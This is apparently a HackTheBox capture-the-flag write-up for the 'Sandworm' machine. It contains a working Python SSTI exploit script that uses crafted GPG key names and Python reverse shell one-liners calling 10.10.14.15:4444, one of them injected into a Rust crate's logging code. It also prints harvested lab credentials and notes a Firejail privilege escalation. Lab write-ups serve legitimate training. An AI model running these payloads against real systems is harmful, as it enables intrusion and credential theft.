Snadworm is a HackTheBox lab Linux machine released on 17/6/23 in Beta Season II.
This machine features:
GnuPG
Server-side Template Injection
Rust
Firejail Vulnerability
Reconnaissance
Port Scanning
A quick port scanning shows us there're ports 22, 80, and 443:
$ sudo nmap -p- -n -Pn -sS -T4 --min-rate 1000 -v 10.129.77.49 -oN ports.nmap
...
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
...
Hostname
The certificate returned tells us the hostname is ssa.htb.
$ openssl s_client -connect <IP>:443 -showcerts
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 C = SA, ST = Classified, L = Classified, O = Secret Spy Agency, OU = SSA, CN = SSA, emailAddress = atlas@ssa.htb
verify error:num=18:self signed certificate
verify return:1
depth=0 C = SA, ST = Classified, L = Classified, O = Secret Spy Agency, OU = SSA, CN = SSA, emailAddress = atlas@ssa.htb
verify return:1
---
Certificate chain
0 s:C = SA, ST = Classified, L = Classified, O = Secret Spy Agency, OU = SSA, CN = SSA, emailAddress = atlas@ssa.htb
i:C = SA, ST = Classified, L = Classified, O = Secret Spy Agency, OU = SSA, CN = SSA, emailAddress = atlas@ssa.htb
...
We can also see the same information in the HTTP 301 response using curl.
We see the string {#hi#} disappears this time, which indicates that we've found a SSTI vulnerability.
Remote Code Execution
To abuse the vulnerability to achieve remote code execution, we shall generate keypairs with usernames like {{__import__('os').system('ls')}}.
To automate the process, we write the following script using python-gnupg and cmd modules:
#!/usr/bin/python3
import cmd
import requests
import logging
import shlex
import gnupg
from subprocess import Popen, PIPE
from bs4 import BeautifulSoup as bs
requests.packages.urllib3.disable_warnings()
logger = logging.getLogger(__name__)
class Exploit(cmd.Cmd):
def __init__(self):
super().__init__()
self.proxies = {
'https':'http://localhost:8080'
}
self.url = 'https://ssa.htb'
self.getPGP()
self.gpg = gnupg.GPG()
self.secret = 's3cret'
def get(self, *kargs, **kw):
res = requests.get(*kargs, verify=False, proxies=self.proxies, **kw)
return res
def post(self, *kargs, **kw):
res = requests.post(*kargs, verify=False, proxies=self.proxies, **kw)
return res
def getPGP(self):
res = self.get(self.url + '/pgp')
pgp = bs(res.text, 'lxml').select('pre')[0].text
print(pgp)
with open('ssa.pgp', 'w') as o:
logger.debug(f"got pgp {pgp[:100]}")
o.write(pgp)
pGPExists = b'atlas@ssa.htb' in Popen(shlex.split('gpg --list-keys'), stdout=PIPE).communicate()[0]
logger.debug(f"target's PGP exists:{pGPExists}")
if not pGPExists:
Popen(shlex.split('gpg --import ssa.pgp'))
def inject(self, payload):
name = "Python--->{{%s}}" % payload
logger.debug(f"name {name}")
key = self.gpg.gen_key(self.gpg.gen_key_input(name_real=name, name_email='lala@example.com', passphrase=self.secret))
signed = self.gpg.sign('hello', keyid=key.fingerprint, passphrase=self.secret).data
data = {
'signed_text': signed,
'public_key': self.gpg.export_keys(key.fingerprint)
}
res = self.post(self.url + '/process', data = data)
print(res.text)
def default(self, cmd):
self.inject(cmd)
def do_EOF(self, _):
return True
e = Exploit()
e.cmdloop()
We can also execute remote commands via Python code like request.application.__globals__.__builtins__.__import__('os').popen('ls').read() now:
(cmd) request.application.__globals__.__builtins__.__import__('os').popen('id').read()
...
[GNUPG:] GOODSIG 7BF5637BBF510011 Python--->uid=1000(atlas) gid=1000(atlas) groups=1000(atlas)
<lala@example.com>
gpg: Good signature from "Python--->uid=1000(atlas) gid=1000(atlas) groups=1000(atlas)
...
We can get a reverse shell too.
(Cmd) request.application.__globals__.__builtins__.__import__('os').system('python3 -c "import socket,pty,os;s=socket.socket();s.connect((\"10.10.14.15\",4444));[os.dup2(s.fileno(),i) for i in range(3)];pty.spawn(\"/bin/bash\");"')
Credential Hunting
We see the source of the site is under the path /var/www/html/SSA/SSA.
We can see the cause of the SSTI is the usage of render_template_string:
We found the MySQL credential atlas:GarlicAndOnionZ42:
atlas@sandworm:/var/www/html/SSA/SSA$ cat __init__.py
from flask import Flask
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
def create_app():
app = Flask(__name__)
app.config['SECRET_KEY'] = '91668c1bc67132e3dcfb5b1a3e0c5c21'
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA'
We found the PGP key's passphrase $M1DGu4rD$:
/var/www/html/SSA/SSA/app.py
...
@main.route("/contact", methods=('GET', 'POST',))
def contact():
if request.method == 'GET':
return render_template("contact.html", name="contact")
tip = request.form['encrypted_text']
if not validate(tip):
return render_template("contact.html", error_msg="Message is not PGP-encrypted.")
msg = gpg.decrypt(tip, passphrase='$M1DGu4rD$')
...
We can use Python package sqlalchemy to access the MySQL database SSA.
By formatting the hashes above as, for example, 12154640f87817559bd450925ba3317f93914dc22e2204ac819b90d60018bc1f:q0WZMG27Qb6XwVlZ, we can try to use hashcat to crack the password with mode 1460.
In file ~/.config/httpie/sessions/localhost_5000/admin.json, we found credential silentobserver:quietLiketheWind22.
We can login to the target using SSH with this credential now.
Privilege Escalation
Crate tipnet
We found a crate named tipnet located under directory /opt.
The compiled binary has SUID permission set.
silentobserver@sandworm:~$ ls -l /opt/tipnet/target/debug/tipnet
-rwsrwxr-x 2 atlas atlas 59047248 Jun 6 10:00 /opt/tipnet/target/debug/tipnet
We note that this crate uses an external crate logger located in /opt/crates/logger.
silentobserver@sandworm:~$ cat /opt/tipnet/Cargo.toml
[package]
name = "tipnet"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
chrono = "0.4"
mysql = "23.0.1"
nix = "0.18.0"
logger = {path = "../crates/logger"}
System Activities Monitoring
We can use the tool pspy64 to monitor system activities.
silentobserver@sandworm:~$ ./pspy64 -f
We see that the crate is compiled and executed by cargo run every 1 minute and 50 seconds by root using user atlas with mode e.
We found that we can modify the content of the source of the crate logger which is used in the SUID program tipnet owned by the user atalas.
silentobserver@sandworm:~$ ls -l /opt/crates/logger/src/lib.rs
-rw-rw-r-- 1 atlas silentobserver 732 May 4 17:12 /opt/crates/logger/src/lib.rs
So, we shall be able to execute commands as the user atlas, if we overwrite the source code /opt/crates/logger/src/lib.rs after the script /root/Cleanup/clean_c.sh being executed and before the next compilation triggered by CRON.
We insert the following code after the script /root/Cleanup/clean_c.sh being executed.
...
use std::process::Command;
...
pub fn log(user: &str, query: &str, justification: &str) {
let o = Command::new("python3").args(&["-c", "import socket,pty,os;s=socket.socket();s.connect((\"10.10.14.15\",4444));[os.dup2(s.fileno(),i) for i in range(3)];pty.spawn(\"/bin/bash\");"]).output().expect("none");
println!("{}", String::from_utf8(o.stdout).unwrap());
...
Then we shall receive a reverse shell later.
Firejail
We note that the user if in the group jailer, users of which can run the setuid-root program firejail to sandbox processes.
atlas@sandworm:~$ id
uid=1000(atlas) gid=1000(atlas) groups=1000(atlas),1002(jailer)
atlas@sandworm:~$ ls -l /usr/local/bin/firejail
-rwsr-x--- 1 root jailer 1777952 Nov 29 2022 /usr/local/bin/firejail
The version of the program firejail seems to suffer the local privilege escalation vulnerability.
$ atlas@sandworm:~$ firejail --version
firejail version 0.9.68
